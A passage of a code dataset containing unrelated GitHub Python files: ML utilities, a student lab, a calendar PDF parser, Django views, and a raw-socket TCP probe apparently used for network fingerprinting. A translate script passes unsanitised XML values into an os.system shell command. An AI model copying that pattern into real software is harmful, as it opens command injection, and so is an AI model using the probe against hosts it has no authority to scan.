mmpose.\n\n Args:\n partition_type (str): A string specifying partition type.\n \"\"\"\n raise NotImplementedError('Not supported yet.')\n\n def get_preprocess(self, *args, **kwargs) -> Dict:\n \"\"\"Get the preprocess information for SDK.\n\n Return:\n dict: Composed of the preprocess information.\n \"\"\"\n input_shape = get_input_shape(self.deploy_cfg)\n model_cfg = process_model_config(self.model_cfg, [''], input_shape)\n preprocess = model_cfg.test_dataloader.dataset.pipeline\n return preprocess\n\n def get_postprocess(self, *args, **kwargs) -> Dict:\n \"\"\"Get the postprocess information for SDK.\"\"\"\n codec = self.model_cfg.codec\n if isinstance(codec, (list, tuple)):\n codec = codec[-1]\n component = 'UNKNOWN'\n params = copy.deepcopy(self.model_cfg.model.test_cfg)\n params.update(codec)\n if self.model_cfg.model.type == 'TopdownPoseEstimator':\n component = 'TopdownHeatmapSimpleHeadDecode'\n if codec.type == 'MSRAHeatmap':\n params['post_process'] = 'default'\n elif codec.type == 'UDPHeatmap':\n params['post_process'] = 'default'\n params['use_udp'] = True\n elif codec.type == 'MegviiHeatmap':\n params['post_process'] = 'megvii'\n params['modulate_kernel'] = self.model_cfg.kernel_sizes[-1]\n elif codec.type == 'SimCCLabel':\n export_postprocess = get_codebase_config(self.deploy_cfg).get(\n 'export_postprocess', False)\n params['export_postprocess'] = export_postprocess\n component = 'SimCCLabelDecode'\n elif codec.type == 'RegressionLabel':\n component = 'DeepposeRegressionHeadDecode'\n elif codec.type == 'IntegralRegressionLabel':\n component = 'DeepposeRegressionHeadDecode'\n else:\n raise RuntimeError(f'Unsupported codecs type: {codec.type}')\n postprocess = dict(params=params, type=component)\n return postprocess\n","repo_name":"open-mmlab/mmdeploy","sub_path":"mmdeploy/codebase/mmpose/deploy/pose_detection.py","file_name":"pose_detection.py","file_ext":"py","file_size_in_byte":14475,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"20592311742","text":"import torch\n\nfrom transformers import AdamW, get_linear_schedule_with_warmup\nfrom transformers import T5Tokenizer, T5ForConditionalGeneration,\\\n PegasusTokenizer, PegasusModel, PegasusForConditionalGeneration, \\\n BartTokenizer, BartForConditionalGeneration\n\n\n\ndef build_tokenizer(args):\n tokenizer = None\n if args.model_type.startswith(\"bart\"):\n print(\"\\nUsing Bart tokenizer\")\n tokenizer = BartTokenizer.from_pretrained(args.model, cache_dir = args.cache_dir)\n elif args.model_type.startswith(\"pegasus\"):\n print(\"\\nUsing Pegasus tokenizer\")\n tokenizer = PegasusTokenizer.from_pretrained(args.model, cache_dir = args.cache_dir)\n\n return tokenizer\n\n\ndef build_model(args):\n model = None\n if args.model_type.startswith(\"bart\"):\n print(\"\\nUsing Bart model\")\n model = BartForConditionalGeneration.from_pretrained(args.model, cache_dir = args.cache_dir)\n elif args.model_type.startswith(\"pegasus\"):\n print(\"\\nUsing Pegasus model\")\n model = PegasusForConditionalGeneration.from_pretrained(args.model, cache_dir = args.cache_dir)\n\n return model\n\n\ndef build_optimizer(model, args):\n optimizer = None\n if args.optimizer == \"adam\":\n print(\"\\nUsing Adam\")\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.wd)\n if args.optimizer == \"adamw\":\n print(\"\\nUsing AdamW\")\n optimizer = torch.optim.AdamW(model.parameters(), lr=args.lr, weight_decay=args.wd)\n\n return optimizer\n\n\ndef build_scheduler(optimizer, train_steps, args):\n scheduler = None\n if args.scheduler == \"linear_warmup\":\n print(\"\\nUsing linear warmup scheduler\")\n warmup_steps = int(args.warmup_ratio * train_steps)\n print(\"Number of warmup steps: {}\".format(warmup_steps))\n scheduler = get_linear_schedule_with_warmup(optimizer, warmup_steps, train_steps)\n\n return scheduler\n\n\ndef nested_detach(tensors):\n \"Detach `tensors` (even if it's a nested list/tuple of tensors).\"\n if isinstance(tensors, (list, tuple)):\n return type(tensors)(nested_detach(t) for t in tensors)\n\n return tensors.detach()\n","repo_name":"Ravoxsg/SummaReranker","sub_path":"src/base_model_finetuning/transfer_utils.py","file_name":"transfer_utils.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"22680397382","text":"#!/usr/bin/python\n# coding:utf-8\n\nimport sys\nimport os\nimport json # 导入json模块\nimport urllib # 导入urllib模块\nfrom urllib import request, parse\nfrom urllib.error import URLError, HTTPError\nimport _md5\nimport datetime\nfrom lxml import etree\nimport refreshTKK\n\nTKK = refreshTKK.refreshTKK()\n\n\ndef translate(cnValue='english', tl='zh-CN'):\n global TKK\n os.system('node gettk.js > result ' + cnValue + ' ' + TKK)\n result = open('result', 'r')\n tk = result.read().replace('\\n', '')\n result.close()\n\n headers = {\n 'Upgrade-Insecure-Requests': 1,\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36',\n }\n q = parse.quote(cnValue)\n url = 'https://translate.google.cn/translate_a/single?client=t&sl=auto&tl=' + tl + \\\n '&hl=zh-CN&dt=at&dt=bd&dt=ex&dt=ld&dt=md&dt=qca&dt=rw&dt=rm&dt=ss&dt=t&ie=UTF-8&oe=UTF-8&source=btn&ssel=0&tsel=0&kc=0&tk=' + tk + '&q=' + q\n\n try:\n resultPage = request.urlopen(request.Request(url, headers=headers))\n # 取得翻译的结果,翻译的结果是json格式\n resultJason = resultPage.read().decode('utf-8')\n js = None\n try:\n # 将json格式的结果转换成Python的字典结构\n js = json.loads(resultJason)\n result = js[0][0][0]\n print('result: ' + result)\n except Exception as e:\n print('loads Json error.')\n print(e)\n result = cnValue\n except HTTPError as e:\n print('The server couldn\\'t fulfill the request.')\n print('Error code: ', e.code)\n print('url: ', url)\n result = cnValue\n except URLError as e:\n print('We failed to reach a server.')\n print('Reason: ', e.reason)\n print('url: ', url)\n result = cnValue\n except Exception as e:\n print('translate error.')\n print(e)\n print('url: ', url)\n result = cnValue\n return result\n\n\ndef iteratorElem(elememt):\n for sub in elememt:\n try:\n cnValue = sub.attrib['value3']\n sub.attrib['value4'] = translate(cnValue, 'zh-TW')\n sub.attrib['value5'] = translate(cnValue, 'ar')\n sub.attrib['value6'] = translate(cnValue, 'fr')\n except KeyError as e:\n pass\n finally:\n iteratorElem(sub)\n\n\nif __name__ == '__main__':\n # 通过获得命令行参数获得输入输出文件名\n for rt, dirs, files in os.walk(os.getcwd() + os.sep):\n for f in files:\n if(not os.path.exists(os.getcwd() + os.sep + f)):\n continue\n fname = os.path.splitext(f)\n if fname[1].lower() == \".xml\":\n tree = etree.parse(f)\n root = tree.getroot()\n iteratorElem(root)\n tree.write(f, encoding=\"UTF-8\")\n","repo_name":"YScxw/learnPython","sub_path":"谷歌翻译.py","file_name":"谷歌翻译.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17982882621","text":"import numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import pairwise_distances\nfrom sklearn.neighbors import NearestNeighbors\n\nfrom dance.transforms.base import BaseTransform\nfrom dance.typing import Sequence\nfrom dance.utils.matrix import pairwise_distance\n\n\nclass SpaGCNGraph(BaseTransform):\n\n _DISPLAY_ATTRS = (\"alpha\", \"beta\")\n\n def __init__(self, alpha, beta, *, channels: Sequence[str] = (\"spatial\", \"spatial_pixel\", \"image\"),\n channel_types: Sequence[str] = (\"obsm\", \"obsm\", \"uns\"), **kwargs):\n \"\"\"Initialize SpaGCNGraph.\n\n Parameters\n ----------\n alpha\n Controls the color scale.\n beta\n Controls the range of the neighborhood when calculating grey values for one spot.\n\n \"\"\"\n super().__init__(**kwargs)\n\n self.alpha = alpha\n self.beta = beta\n self.channels = channels\n self.channel_types = channel_types\n\n def __call__(self, data):\n xy = data.get_feature(return_type=\"numpy\", channel=self.channels[0], channel_type=self.channel_types[0])\n xy_pixel = data.get_feature(return_type=\"numpy\", channel=self.channels[1], channel_type=self.channel_types[1])\n img = data.get_feature(return_type=\"numpy\", channel=self.channels[2], channel_type=self.channel_types[2])\n self.logger.info(\"Start calculating the adjacency matrix using the histology image\")\n\n g = np.zeros((xy.shape[0], 3))\n beta_half = round(self.beta / 2)\n x_lim, y_lim = img.shape[:2]\n for i, (x_pixel, y_pixel) in enumerate(xy_pixel):\n top = max(0, x_pixel - beta_half)\n left = max(0, y_pixel - beta_half)\n bottom = min(x_lim, x_pixel + beta_half + 1)\n right = min(y_lim, y_pixel + beta_half + 1)\n local_view = img[top:bottom, left:right]\n g[i] = np.mean(local_view, axis=(0, 1))\n g_var = g.var(0)\n self.logger.info(f\"Variances of c0, c1, c2 = {g_var}\")\n\n z = (g * g_var).sum(1, keepdims=True) / g_var.sum()\n z = (z - z.mean()) / z.std()\n z *= xy.std(0).max() * self.alpha\n\n xyz = np.hstack((xy, z)).astype(np.float32)\n self.logger.info(f\"Varirances of x, y, z = {xyz.var(0)}\")\n data.data.obsp[self.out] = pairwise_distance(xyz, dist_func_id=0)\n\n return data\n\n\nclass SpaGCNGraph2D(BaseTransform):\n\n def __init__(self, *, channel: str = \"spatial_pixel\", **kwargs):\n super().__init__(**kwargs)\n\n self.channel = channel\n\n def __call__(self, data):\n x = data.get_feature(channel=self.channel, channel_type=\"obsm\", return_type=\"numpy\")\n data.data.obsp[self.out] = pairwise_distance(x.astype(np.float32), dist_func_id=0)\n return data\n\n\nclass SMEGraph(BaseTransform):\n \"\"\"Spatial Morphological gene Expression graph.\"\"\"\n\n def __init__(self, radius: float = 3, *,\n channels: Sequence[str] = (\"spatial\", \"spatial_pixel\", \"MorphologyFeature\", \"CellPCA\"),\n channel_types: Sequence[str] = (\"obsm\", \"obsm\", \"obsm\", \"obsm\"), **kwargs):\n super().__init__(**kwargs)\n\n self.radius = radius\n self.channels = channels\n self.channel_types = channel_types\n\n def __call__(self, data):\n xy = data.get_feature(return_type=\"numpy\", channel=self.channels[0], channel_type=self.channel_types[0])\n xy_pixel = data.get_feature(return_type=\"numpy\", channel=self.channels[1], channel_type=self.channel_types[1])\n morph_feat = data.get_feature(return_type=\"numpy\", channel=self.channels[2], channel_type=self.channel_types[2])\n gene_feat = data.get_feature(return_type=\"numpy\", channel=self.channels[3], channel_type=self.channel_types[3])\n\n reg_x = LinearRegression().fit(xy[:, 0:1], xy_pixel[:, 0:1])\n reg_y = LinearRegression().fit(xy[:, 1:2], xy_pixel[:, 1:2])\n unit = np.sqrt(reg_x.coef_**2 + reg_y.coef_**2)\n\n # TODO: only captures topk, which are the ones that will be used by SMEFeature.\n pdist = pairwise_distances(xy_pixel, metric=\"euclidean\")\n adj_p = np.where(pdist >= self.radius * unit, 0, 1)\n adj_m = (1 - pairwise_distances(morph_feat, metric=\"cosine\")).clip(0)\n adj_g = 1 - pairwise_distances(gene_feat, metric=\"correlation\")\n adj = adj_p * adj_m * adj_g\n\n data.data.obsp[self.out] = adj\n\n\nclass StagateGraph(BaseTransform):\n \"\"\"STAGATE spatial graph.\n\n Parameters\n ----------\n model_name\n Type of graph to construct. Currently support ``radius`` and ``knn``. See\n :class:`~sklearn.neighbors.NearestNeighbors` for more info.\n radius\n Radius parameter for ``radius_neighbors_graph``.\n n_neighbors\n Number of neighbors for ``kneighbors_graph``.\n\n \"\"\"\n\n _MODELS = (\"radius\", \"knn\")\n _DISPLAY_ATTRS = (\"model_name\", \"radius\", \"n_neighbors\")\n\n def __init__(self, model_name: str = \"radius\", *, radius: float = 1, n_neighbors: int = 5,\n channel: str = \"spatial_pixel\", channel_type: str = \"obsm\", **kwargs):\n super().__init__(**kwargs)\n\n if not isinstance(model_name, str) or (model_name.lower() not in self._MODELS):\n raise ValueError(f\"Unknown model {model_name!r}, available options are {self._MODELS}\")\n self.model_name = model_name\n self.radius = radius\n self.n_neighbors = n_neighbors\n self.channel = channel\n self.channel_type = channel_type\n\n def __call__(self, data):\n xy_pixel = data.get_feature(return_type=\"numpy\", channel=self.channel, channel_type=self.channel_type)\n\n if self.model_name.lower() == \"radius\":\n adj = NearestNeighbors(radius=self.radius).fit(xy_pixel).radius_neighbors_graph(xy_pixel)\n elif self.model_name.lower() == \"knn\":\n adj = NearestNeighbors(n_neighbors=self.n_neighbors).fit(xy_pixel).kneighbors_graph(xy_pixel)\n\n data.data.obsp[self.out] = adj\n","repo_name":"OmicsML/dance","sub_path":"dance/transforms/graph/spatial_graph.py","file_name":"spatial_graph.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","stars":269,"dataset":"github-code","pt":"53"} +{"seq_id":"37661577616","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport json\nfrom xor.utils import NumpyArrayEncoder\nimport logging\n\n# Build and train the model\ndef build_and_train_model(features, labels, hidden_layer = '8', epochs = '5000', lr = '0.01'):\n\n features = torch.from_numpy(np.array(features).astype(np.float32))\n labels = torch.from_numpy(np.array(labels).astype(np.float32).reshape(-1,1))\n \n # Join the features and labels\n data = [d for d in zip(features, labels)]\n\n #Build the model\n model = nn.Sequential(nn.Linear(2, int(hidden_layer)),\n nn.ReLU(),\n nn.Linear(int(hidden_layer), 1))\n\n criterion = nn.BCEWithLogitsLoss()\n optimizer = optim.SGD(model.parameters(), lr = np.float32(lr))\n\n running_losses = []\n\n # Train the model\n for e in range(int(epochs)):\n running_loss = 0\n for data_point in data:\n feature = data_point[0]\n label = data_point[1]\n optimizer.zero_grad()\n output = model(feature)\n loss = criterion(output, label)\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n if e % (int(epochs)/10) == 0:\n #print(f\"Epoch: {e}, Training loss: {running_loss}\")\n running_losses.append(running_loss)\n return model\n\n# Make predictions using the model\ndef predict(model, features, labels):\n features = torch.from_numpy(np.array(features).astype(np.float32))\n labels = torch.from_numpy(np.array(labels).astype(np.float32).reshape(-1,1))\n\n sigmoid = nn.Sigmoid()\n predictions = []\n for f in features:\n predictions.append(sigmoid(model(f)).detach().numpy())\n predictions = np.array(predictions)\n return json.dumps(predictions, cls=NumpyArrayEncoder)\n","repo_name":"luisguiserrano/xor-orquestra","sub_path":"src/python/xor/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25404684117","text":"#Go to 'Main' on line 195 to test questions 2, 3, or 5\r\n\r\n\r\n\r\n\r\n#\r\n#Question 1:\r\n# Returns:\r\n# -turtle.stamp() returns a stamp id so in the future we can\r\n# reference/delete\r\n# -turtle.speed() returns the current speed if none is specified\r\n# -turtle.pos() returns the x and y coordinates of the turtle's\r\n# current position\r\n# Does not return:\r\n# -turtle.forward() doesn't need to return because it's a one time\r\n# event\r\n# -turtle.back() also doesn't need to return because it's a one\r\n# time event\r\n# -turtle.right() doesn't need to return because it's a one time\r\n# event\r\n#\r\n\r\nimport math\r\nimport turtle\r\n\r\n\r\n\r\n\r\n#Question 2 to be called in Main\r\ndef Question_2():\r\n \"\"\"Implement a function called circleArea that calculates the area\r\nof a circle given the circle’s radius. Have the function print the value\r\nof the area and return nothing to the calling program. Verify that the\r\nfunction is working correctly by calling the function several times with\r\ndifferent radius values. \"\"\"\r\n\r\n #define constants\r\n RADIUS = 10\r\n\r\n\r\n #call function circlearea\r\n CircleArea(RADIUS)\r\n\r\ndef CircleArea(r):\r\n area = (math.pi) * (r ** 2)\r\n print(area)\r\n\r\n\r\n\r\n\r\n\r\n\r\n#Question 3 to be called in Main\r\ndef Question_3():\r\n \"\"\"Make a copy of your python program for exercise 2 and change the\r\nfunction so that it prints nothing and returns the area value it\r\ncalculated. Verify that the function is working correctly by calling the\r\nfunction several times with different radius values. Note that you will\r\nhave to make the calling program print out the value.\"\"\" \r\n\r\n #define constants\r\n RADIUS = 10\r\n\r\n\r\n #call function circlearea to print area\r\n CircleArea2(RADIUS)\r\n \r\n result = CircleArea2(RADIUS)\r\n print(result)\r\n\r\ndef CircleArea2(r):\r\n area = (math.pi) * (r **2)\r\n return area\r\n\r\n\r\n\r\n\r\n#Question 5i to be called in Main\r\ndef Question_5i():\r\n \"\"\"Fairly simple math will calculate the sides and angles of the\r\ninside square. If we assume that the distance “a” is some fraction of\r\nthe size of the blue square the calculations are:\r\n a = fraction * size\r\n b = size – a\r\n size’ = sqrt(a2 + b2)\r\n α = tan-1(a/b) (in python, atan2(a,b))\r\nImplement a function that will draw the red square. The \r\nfunction should have 3 input parameters: a turtle, the size of the blue square, and the \r\nfraction used to calculate “a”.\"\"\"\r\n\r\n #define constants and make graphics window\r\n wn = turtle.Screen()\r\n wn.bgcolor(\"white\")\r\n t = turtle.Turtle()\r\n \r\n FRACTION = (1/5)\r\n SIZE = 60\r\n\r\n\r\n #math needed to draw squares\r\n a = FRACTION * SIZE\r\n b = SIZE - a\r\n SIZE2 = math.sqrt( a**2 + b**2)\r\n alpha = math.degrees(math.atan2(a,b))\r\n\r\n\r\n #draw the blue, then red squares\r\n drawSquares(t, SIZE, SIZE2, b, alpha)\r\n wn.exitonclick()\r\n\r\n\r\ndef drawSquares(t, SIZE, SIZE2, b, alpha):\r\n\r\n #draw blue square\r\n t.color(\"blue\")\r\n for i in range(4):\r\n t.forward(SIZE)\r\n t.left(90)\r\n\r\n #draw red square\r\n t.color(\"red\")\r\n TURN = 90 - alpha\r\n t.penup()\r\n t.forward(b)\r\n t.pendown()\r\n t.left(180)\r\n t.right(alpha)\r\n for i in range(4):\r\n t.forward(SIZE2)\r\n t.right(90)\r\n\r\n\r\n\r\n\r\n\r\n#Question 5ii to be called in Main\r\ndef Question_5ii():\r\n \"\"\"Now let’s use the previous function to draw multiple inside squares\r\nCreate a new function that draws multiple squares inside a square. This\r\nfunction should also have three parameters: a turtle, the size of the\r\noutside square, and the number of inside squares to draw. This function\r\nshould call the function you have already created to draw an inside square\r\nYou should now be able to draw shapes that look like the figures to the\r\nright. The shapes have 2, 4, and 9 inside squares.\r\"\"\"\r\n\r\n #define constants and make graphics window\r\n wn = turtle.Screen()\r\n wn.bgcolor(\"white\")\r\n t = turtle.Turtle()\r\n \r\n FRACTION = (1/5)\r\n SIZE = 60\r\n\r\n\r\n #math needed to draw squares\r\n a = FRACTION * SIZE\r\n b = SIZE - a\r\n SIZE2 = math.sqrt( a**2 + b**2)\r\n alpha = math.degrees(math.atan2(a,b))\r\n\r\n\r\n #draw the blue squares\r\n drawSquares(t, SIZE, SIZE2, b, alpha)\r\n wn.exitonclick()\r\n\r\n\r\ndef drawSquares(t, SIZE, SIZE2, b, alpha):\r\n\r\n #draw main square\r\n t.color(\"blue\")\r\n for i in range(4):\r\n t.forward(SIZE)\r\n t.left(90)\r\n\r\n #draw other squares\r\n\r\n\r\n\r\n\r\n\r\n#Main\r\n#Question_2()\r\n#Question_3()\r\n#Question_5i()\r\n#Question_5ii()\r\n\r\n\r\n\r\n\r\n#\r\n#Question 4:\r\n# i: Yes on exercise 2. No on exercise 3 because you haven't printed the\r\n# returned value.\r\n# ii: No on exercise 2 because you print the answer twice. Yes on\r\n# exercise 3.\r\n# iii: Yes on exercise 2. No on exercise 3 because you haven't printed the\r\n# returned value.\r\n# iv: Yes on exercise 2. No on exercise 3 because you haven't printed the\r\n# returned value.\r\n# v: No on both exercises. This equation is showing how to find the\r\n# area. It's a boolean expression that would have the value 'true'\r\n#\r\n","repo_name":"NathanRuprecht/CS210_IntroToProgramming","sub_path":"DailyLabs/Lab07/Lab07.py","file_name":"Lab07.py","file_ext":"py","file_size_in_byte":5128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2868111605","text":"import PyPDF2\nimport os\nimport re\n\ndef parse_string(line):\n\tline=line.replace(\"\\n\",\"\")\n\tk=re.search(\"\\d\",line).start()\n\tdate=line[k]\n\ttry:\n\t\tint(line[k+1])\n\t\tdate=date+line[k+1]\n\t\tinfo=line[k+2:]\n\texcept:\n\t\tinfo=line[k+1:]\n\n\tday=line[:k]\n\tday=day.replace(\" \",\"\")\n\treturn [date,day,info.strip()]\n\n\n\npdfFile=open(\"AcademicCalendar.pdf\",\"rb\")\nfo=open(\"cleaned.csv\",\"w\")\n\nreader=PyPDF2.PdfFileReader(pdfFile)\ndays=[\"mon\",\"tue\",\"wed\",\"thu\",\"fri\",\"sat\",\"sun\"]\nmonth=[\"JUNE\",\"JULY\",\"AUGUST\",\"SEPTEMBER\",\"OCTOBER\",\"NOVEMBER\",\"DECEMBER\",\"JANUARY\",\"FEBRUARY\",\"MARCH\",\"APRIL\",\"MAY\",\"JUNE\"]\n#reader.numPages\nfor x in range(reader.numPages):\n\t#print \"\\nMONTH : \",month[x],\"\\n\"\n\tfo.write(month[x]+\"\\n\")\n\tdata=reader.getPage(x).extractText()\n\tj=0\n\tlength=len(data)\n\t\n\twhile j+3<=length:\n\n\t\ttemp=data[j:j+3]\n\n\t\tif temp.lower() in days: \n\t\t\tvarint=j\n\t\t\tj=j+3\n\t\t\ti=(days.index(temp.lower())+1)%7\n\n\t\t\twhile True:\n\t\t\t\ttemp1=data[j:j+3]\n\n\t\t\t\tif temp1.lower()==days[i]:\n\t\t\t\t rawdata=data[varint:j].split(\"\\n\")\n\t\t\t\t rawdata=\" \".join(rawdata)\n\t\t\t\t rawdata=parse_string(rawdata)\n\t\t\t\t #print rawdata\n\t\t\t\t rawdata=\",\".join(rawdata)+\"\\n\"\n\t\t\t\t fo.write(rawdata) \n\t\t\t\t j=j-1\n\t\t\t\t break\n\n\t\t\t\tif j+3>=length:\n\t\t\t\t rawdata=data[varint:].split(\"\\n\")\n\t\t\t\t rawdata=\" \".join(rawdata)\n\t\t\t\t rawdata=parse_string(rawdata)\n\t\t\t\t #print rawdata\n\t\t\t\t rawdata=\",\".join(rawdata)+\"\\n\"\n\t\t\t\t fo.write(rawdata) \n\t\t\t\t break\n\n\t\t\t\tj=j+1\n\t\tj=j+1\n\t#print \"\\n\\n\"\n\nfo.close()\n\t\t\t\t\n\n","repo_name":"Ajithkumarsekar/KCT-Academic-Calendar-Converter","sub_path":"KCT-Calendar/academic.py","file_name":"academic.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"24675341693","text":"from django.shortcuts import render\nfrom .models import Post\nposts = [\n {\n 'Author': 'rahul',\n 'Title': 'blog 1st Post 1',\n 'content': 'content of 1st post 1',\n 'date_posted': 'oct 27, 2021'\n },\n {\n 'Author': 'testuser',\n 'Title': 'blog 1st Post 2',\n 'content': 'content of 1st post 2',\n 'date_posted': 'oct 28, 2021'\n }\n]\n\ndef home(request):\n context = {\n 'posts': Post.objects.all()\n }\n return render(request, 'blog/home.html', context)\n\ndef about(request):\n return render(request, 'blog/about.html', {'Title': 'About'})","repo_name":"rahul-mn/django-jenkins-docker-k8s-files","sub_path":"django_test/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26277295974","text":"\n# coding: utf-8\n\n# # Save and Inspect the state\n\n# In[66]:\n\n\nimport os\nimport numpy as np\n\n\n# In[67]:\n\n\ndef save_state(data_store, step, state, value, accepted_p, \n mean=None, covariance=None, scale=None, threshold=None, C_evol_pt=None):\n data_store['States'][step] = state\n data_store['Densities'][step] = value\n data_store['Accepted_p'][step] = accepted_p\n data_store['Means'][step] = mean \n data_store['Covariances'][step] = covariance \n data_store['Scales'][step] = scale\n data_store['Thresholds'][step] = threshold\n \ndef inspect_state(data_store, step):\n state = data_store['States'][step]\n value = data_store['Densities'][step] \n accepted_p = data_store['Accepted_p'][step] \n mean = data_store['Means'][step] \n covariance = data_store['Covariances'][step] \n scale = data_store['Scales'][step]\n threshold = data_store['Thresholds'][step] \n print(\"State:\", state, \"R: \", scale, \"\\nThreshold: \", threshold, \"\\nState: \", state, \n \"\\nIt's value: \", value, \"\\nMean: \", mean, \n \"\\nCovariance: \", covariance)\n\n\n# # Save in the file format used by *PyMC3*\n\n# ## Structure of the data directory\n# \n# The directory structure of 'Data' is as follows\n# \n# 1. for each dimension $d$ of the state space, 'Data' contains a folder 'Dim d' \n# 2. for each target, 'Dim d' contains a folder 'Target k' where $k$ is the index of \n# that targets in the test suite\n# 3. for each sampler, 'Target k' contains a folder named after that sampler\n# 4. for each run given the dimension of the state space, the target and the sampler, \n# a file 'chain_i' is generated where $i$ is the index of the run. \n# \n# \n# The global variable PARENT_FOLDER contains the parent folder, i.e. the folder where the experimental data will be store, e.g.\n# \n# PARENT_FOLDER = '/Users/BM/Documents/Programming/Python/Notebooks/MCMC/To execute a run'\n# \n# The functions below assume that the parent folder is correctly set.\n\n# In[68]:\n\n\ndef relative_path_to_chain(dim, t_name, s_name):\n data_folder = 'Data'\n dim_folder = 'Dimension_{}'.format(dim)\n target_folder = t_name\n sampler_folder = s_name\n return './'+'/'.join([data_folder, dim_folder, target_folder, sampler_folder])\n\nclass ChDir(object):\n \"\"\"\n Step into a directory temporarily.\n \"\"\"\n def __init__(self, path):\n self.old_dir = os.getcwd()\n self.new_dir = path\n \n def __enter__(self):\n os.chdir(self.new_dir)\n \n def __exit__(self, *args):\n os.chdir(self.old_dir)\n\ndef save_chain(chain, idx, individual_components_p=True):\n \"\"\"Save a single-chain trace with index 'idx'. PyMC3 uses the labels x__0, x__1, x__2, etc.\n for a vector when are regarded as COMPONENTS of that vector. \n If we want to treat them INDIVIDUALLY the labels x_0, x_1, x_2, etc. have to be used. \n This is, we use double versus single underscore.\n \"\"\"\n chain_name = 'chain-{}.csv'.format(idx)\n _, nbcols = chain.shape\n underscore = '_' if individual_components_p else '__'\n varnames = ['x{}{}'.format(underscore, index) for index in range(nbcols)]\n header = ','.join(varnames)\n np.savetxt(fname=chain_name, X=chain, header=header, comments='', delimiter=',')\n\ndef save_run_data(run_data, parent_folder):\n warning = 'Parent Folder \\'%s\\' does NOT exist'%(parent_folder)\n if not os.path.exists(parent_folder):\n return warning\n chain = run_data.DataStore['States']\n chain_folder = relative_path_to_chain(dim=run_data.StateSpace['dim'],\n t_name=run_data.Target['Name'] , \n s_name=run_data.Sampler['Name'])\n if not os.path.exists(chain_folder):\n os.makedirs(chain_folder)\n with ChDir(chain_folder):\n nbfiles = len(os.listdir())\n save_chain(chain=chain, idx=nbfiles)\n\ndef save_comparison(combined_data, parent_folder):\n for i, run_data in enumerate(combined_data):\n save_run_data(run_data, parent_folder)\n\n\n# In[75]:\n\n\ndef read_states(f_name, dim, t_name, s_name):\n chains_folder = relative_path_to_chain(dim=dim, t_name=t_name, s_name=s_name)\n with ChDir(chains_folder):\n return np.loadtxt(fname=f_name, skiprows=1, delimiter=',')\n\n","repo_name":"philipk01/Optimization_and_Sampling_for_Bayesian_Inference","sub_path":"FileHandling.py","file_name":"FileHandling.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"4007189411","text":"# question's link : https://leetcode.com/problems/contains-duplicate-ii/description/\nfrom typing import List\nclass Solution:\n def containsNearbyDuplicate(self, nums: List[int], k: int) -> bool:\n dic = {}\n for i, v in enumerate(nums):\n if v in dic and i - dic[v]<=k:\n return True\n dic[v] = i\n return False\n\ns = Solution()\nnums = list(map(int,input().split(\",\")))\nk = int(input())\nprint(s.containsNearbyDuplicate(nums,k))\n","repo_name":"anirbang324/problem-solving-codechef-geeksforgeeks-hackerrank_and_leetcode_easy_-_medium_questions","sub_path":"219. Contains Duplicate II - leetcode.py","file_name":"219. Contains Duplicate II - leetcode.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14742772238","text":"import socket\nimport time\nimport struct\nfrom probes.Probe import Probe\n\n\nclass TCPProbe(Probe):\n def send(self, target_ip):\n time.sleep(1)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind((self.source_ip, self.source_port))\n try:\n s.connect((target_ip, self.target_port))\n except socket.error as msg:\n # print(\"Connection doesn't accept TCP connections on that port!\")\n pass\n s.close()\n\n def receive(self):\n try:\n my_socket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))\n except socket.error as msg:\n pass\n # return msg\n\n has_ip_header = False\n\n my_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n my_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n my_socket.bind((self.interface, 0x0800))\n\n while True:\n packet = my_socket.recvfrom(100)\n # Unterscheiden zwischen den einzelnen Headern\n ethernet_header = packet[0][0:14]\n ip_header = packet[0][14:34]\n tcp_header_default = packet[0][34:54]\n\n # Die Bytes in Strings umwandeln\n ethernet_information = struct.unpack('!6s6s1h',ethernet_header) # 0: Destination_mac, 1: Source_mac, 2: Type\n ip_information = struct.unpack('!1s1s2s2s1s1s1s1s2s4s4s', ip_header)\n tcp_information_default = struct.unpack('!2s2s4s4s1s1s1h2s2s', tcp_header_default)\n\n # Informationen aus den Strings auslesen\n ip_address_source = socket.inet_ntoa(ip_information[9])\n ip_address_destination = socket.inet_ntoa(ip_information[10])\n ip_ttl = ord(ip_information[6]) # ord()\" wandelt den -Wert in ein -Wert um (nach der ASCII-Codierung)!\n tcp_length_with_flags_bin_teil_1 = bin(ord(tcp_information_default[4]))[2:].zfill(8) # gives something like 0b1010000010100000 with 2*8=16 bits\n tcp_length = 